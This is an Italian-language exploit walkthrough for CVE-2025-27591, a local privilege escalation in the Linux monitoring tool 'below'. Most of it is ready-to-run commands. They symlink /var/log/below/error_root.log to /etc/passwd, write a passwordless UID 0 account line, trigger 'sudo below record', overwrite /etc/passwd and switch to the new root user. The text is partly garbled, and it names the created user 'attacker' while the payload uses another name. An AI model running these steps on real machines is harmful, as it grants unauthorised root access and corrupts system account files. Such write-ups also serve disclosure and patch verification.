
CVE-2025-27591 è una nota vulnerabilità di escalation dei privilegi nel servizio Below (versione < v0.9.0)
belowQuesto è un semplice exploit per CVE-2025-27591, una vulnerabilità di escalation locale dei privilegi nello strumento di monitoraggio di sistema Linux below. La vulnerabilità interessa le versioni precedenti alla v0.9.0 e deriva da assegnazioni errate dei permessi nel sistema. Il problema è stato scoperto a gennaio 2025 e divulgato pubblicamente il 12 marzo 2025 (SecurityOnline, OpenWall). Quando below viene eseguito con sudo, può registrare errori in una directory scrivibile da tutti (/var/log/below), consentendo agli attaccanti di creare un symlink da un file di log a obiettivi sensibili come /etc/passwd.
Sfruttando questo, un utente non privilegiato con accesso sudo a below può elevare i propri privilegi a root.
belowbelow record/var/log/below/error_root.log/var/log/below è scrivibile da tuttisudo /usr/bin/below record senza password✅ Passaggio 1: Verifica che la directory di log sia scrivibile da tutti Dovresti vedere:
drwxrwxrwx 2 root root 4096 ... /var/log/below

✅ Passaggio 2: Rimuovi eventuali error_root.log esistenti
rm -f /var/log/below/error_root.log
✅ Passaggio 3: Crea un symlink verso /etc/passwd
ln -s /etc/passwd /var/log/below/error_root.log
poi verifica usando
ls -la /var/log/below/error_root.log
# should show: error_root.log -> /etc/passwd

✅ Passaggio 4: Crea un file payload Questo aggiungerà un nuovo utente root di nome attacker senza password:
echo 'dollarboysushil::0:0:dollarboysusil:/root:/bin/bash' > /tmp/payload
struttura del file
username:password:UID:GID:comment(home/full name):home_directory:shell
il punto chiave qui è UID e GUID
impostiamo UID e GUID a 0 rendendo l'utente un utente root e Group ID = gruppo root

✅ Passaggio 5: Attiva la scrittura del log come root Questo è il cuore dell'exploit.
sudo /usr/bin/below record
Ci si aspetta che questo comando fallisca o vada in timeout, ma tenterà di scrivere i log di errore in /var/log/below/error_root.log, che in realtà è /etc/passwd. 💡 In alcuni casi, questo da solo potrebbe corrompere /etc/passwd — quindi successivamente lo sovrascriviamo completamente.
✅ Passaggio 6: Sovrascrivi /etc/passwd tramite il symlink
cp /tmp/payload /var/log/below/error_root.log

✅ Passaggio 7: Diventa root
su attacker
Ti ritroverai in una shell root, senza bisogno di password.

python3 dbs_exploit.py
